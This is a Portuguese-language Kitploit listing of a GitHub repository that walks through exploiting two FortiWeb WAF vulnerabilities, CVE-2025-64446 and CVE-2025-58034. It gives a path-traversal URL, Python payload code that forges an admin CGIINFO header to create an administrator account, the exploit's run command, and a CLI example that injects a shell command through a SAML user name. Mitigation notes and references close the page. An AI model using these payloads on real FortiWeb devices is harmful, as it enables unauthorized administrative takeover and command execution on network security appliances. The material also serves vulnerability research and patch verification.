Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Vulnerability-CVE-2025-64446-CVE-2025-58034 — Lỗ hổng FORTIWEB_CVE-2025-64446 & CVE-2025-58034 | Kitploit
Ferramentas/GitHubGitHub/litndat/vulnerability-cve-2025-64446-cve-2025-58034
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHublitndat/vulnerability-cve-2025-64446-cve-2025-58034

Vulnerability-CVE-2025-64446-CVE-2025-58034

Lỗ hổng FORTIWEB_CVE-2025-64446 & CVE-2025-58034

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 1 mêsAinda não revisado

Simulação de exploração do FortiWeb (CVE-2025-64446 & CVE-2025-58034)

Nota:

  • Este documento serve apenas para fins de aprendizado e pesquisa em segurança.
  • Não use para atacar sistemas sem autorização prévia.

1. Visão geral

FortiWeb é um dispositivo Web Application Firewall (WAF) usado para proteger aplicações web.

Em 2025, duas vulnerabilidades críticas foram descobertas:

  • CVE-2025-64446 – Bypass de autenticação via Path Traversal
  • CVE-2025-58034 – OS Command Injection

2. Visão geral do CVE-2025-64446

ItemConteúdo
Tipo de vulnerabilidadeRelative Path Traversal
Authentication Bypass
CausaO FortiWeb processa caminhos de forma insegura antes da autenticação:

- Controle de acesso baseado em string de caminho lógico
- Não normaliza o caminho completo
- Permite o uso de ../ para acessar recursos internos
DescriçãoAlguns endpoints administrativos podem ser acessados sem autenticação válida
Impacto- Bypass total de autenticação
- Acesso não autorizado a funções de admin
- Quebra do modelo de privilégios
Versões afetadas- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.4
- 7.4.0 – 7.4.9
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11

Exemplo:

root@kitploit:~
/api/v2.0/cmdb/system/../../../../../../cgi-bin/fwbcgi

3. Visão geral do CVE-2025-58034


4. Processo de experimentação (POC)

4.1. Preparação do ambiente:

root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

Isso ajuda a evitar conflitos de versão de bibliotecas, garante a estabilidade do ambiente de trabalho e reduz o impacto no sistema

image

4.2 Exploração

Payload

root@kitploit:~
 cgiinfo_json = {
        "username": "admin",
        "profname": "prof_admin",
        "vdom": "root",
        "loginname": "admin"
    }
cgiinfo_b64 = base64.b64encode(json.dumps(cgiinfo_json).encode()).decode()
conn.request("POST", "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi", body=body_data, headers=headers)
        resp = conn.getresponse()
result = {
            'target': f"{host}:{port}",
            'status': resp.status,
            'user': username,
            'password': password,
            'success': resp.status == 200
        }

Execute a ferramenta com Python3:

root@kitploit:~
python3 exploit.py <IP_target>
  • <IP_target>: O endereço IP aqui é o nome do host do dispositivo FortiWeb.
image

Obtém-se username e password -> proceda ao login

image image

Exploração bem-sucedida e criação de uma nova conta com privilégios de admin.

4.3 Exploração do CVE-2025-58034 após login na conta

Após login bem-sucedido com a nova conta de administrador criada, o atacante pode explorar a vulnerabilidade de injeção de comandos autenticada através de requisições especialmente criadas ou diretamente pela interface de linha de comando do FortiWeb CLI:

root@kitploit:~
config user saml-user

edit "`id`" ## insira o comando aqui

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

O FortiWeb sairá da string de configuração e executará o comando id durante o processo de configuração do saml-user.

5. Algumas formas de mitigar as vulnerabilidades

  • Atualizar o FortiWeb para a versão corrigida.
  • Restringir o acesso à interface de administração.
  • Não expor a interface de gerenciamento à Internet.
  • Verificar contas de admin suspeitas.

6. Referências adicionais

  • CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
  • CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
Baixar ferramenta
ItemConteúdo
Tipo de vulnerabilidadeOS Command Injection (CWE-78)
CausaO FortiWeb processa entrada de forma insegura ao executar comandos do sistema operacional:

- Não valida a entrada
- Falta de escape de caracteres especiais
- Passa dados do usuário diretamente para comandos do sistema
DescriçãoA vulnerabilidade requer autenticação, mas permite injeção de comandos do sistema
Impacto- Execução de comandos não intencionais
- Acesso a recursos do sistema
- Afeta integridade e disponibilidade
Versões afetadas- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.5
- 7.4.0 – 7.4.10
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11